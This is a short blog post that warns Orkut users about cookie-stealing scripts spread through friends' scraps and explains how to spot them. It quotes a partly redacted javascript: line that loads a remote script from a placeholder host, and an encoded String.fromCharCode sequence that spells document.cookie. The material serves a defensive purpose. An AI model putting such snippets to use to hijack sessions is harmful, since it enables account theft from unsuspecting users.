How to Detect a Cookie Stealing Script on Orkut?
If you have a look at the screen shot, you’ll notice one of my contacts sending me a scrap with a cookie stealing script. Basically he has been hacked and the hacker is now using scrap all friends to scrap all his friends who may believe that their dear friend is sending them a script and they would not hesitate to use it. This can happen to anyone of us. So it’s necessary for all of us to recognize which scripts are there for our cookies.
» Cookie Stealing Scripts on Orkut
» The Normal Script
This javascript consists of the profile id and cookie call if you observe the script carefully. In case you ever see a UID=123456722489 and document.cookie in a script then you must remember - never ever run that script.
» Script Uploaded on a Third Party Server
This script consists of a link which is usually a user.js
javascript:increasing_members=document.get(’head’)[0]; a=document.xxxxElement(’script’); a.src=’http://anylink.js’; c.append(a); void(0)
This anylink.js refers to a grease monkey script.The anylink.js is uploaded on an third party sever hence, you don’t know what it’s unless you download it and open in a notepad to see the actual love
» Document.Cookie Encoded - Cookie Stealing Script
This is the most used and deadliest of all cookie stealing script on orkut. Unfortunately, i have seen them circulating in many scrapbooks and communities. In this script, the cookie stealing function is coded hence not easily detectable.
String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101)
The numbers shown above when decoded show up = document.cookie . I hope you can guess what they can be used for.
No comments:
Post a Comment